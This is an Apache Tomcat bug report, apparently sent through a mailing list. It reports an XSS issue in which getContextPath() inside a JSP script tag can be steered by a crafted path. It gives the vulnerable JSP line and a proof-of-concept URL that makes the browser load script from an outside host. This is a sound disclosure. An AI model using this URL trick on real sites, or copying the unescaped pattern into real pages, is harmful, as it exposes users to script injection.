https://bz.apache.org/bugzilla/show_bug.cgi?id=65895

            Bug ID: 65895
           Summary: getContextPath() might introduce a xss cross site
           Product: Tomcat 9
           Version: 9.0.58
          Hardware: PC
                OS: Mac OS X 10.1
            Status: NEW
          Severity: normal
          Priority: P2
         Component: Catalina
          Assignee: dev@tomcat.apache.org
          Reporter: hawkc...@potix.com
  Target Milestone: -----

# steps to reproduce
1. you create a jsp page to include a js with the context path:

<script src="<%=request.getContextPath() %>/import.js"></script>


2. visit the URL below:
localhost:8080/&sol;ptst.io&sol;xsspoc&quest;/..;/myapp/contextpath.jsp

(assuming "myapp" is the application context path)

# Current result
a browser will load the cross-site script ptst.io/xsspoc

# Expected result
doesn't load ptst.io/xsspoc

# Other information
* I'm not sure it's a bug or not, welcome any input
* someone mentioned this issue:
https://blog.rakeshmane.com/2020/04/jsp-contextpath-link-manipulation-xss.html
* I have tried this on tomcat 7,8,9, all have the same issue
* tomcat maven plugin doesn't have this issue
            <plugin>
                <groupId>org.apache.tomcat.maven</groupId>
                <artifactId>tomcat7-maven-plugin</artifactId>
                <version>2.2</version>
                <configuration>
                    <port>8080</port>
                    <path>/${project.artifactId}</path>
                </configuration>
            </plugin>
* jetty 9 doesn't have this issue.

-- 
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org
For additional commands, e-mail: dev-h...@tomcat.apache.org

Reply via email to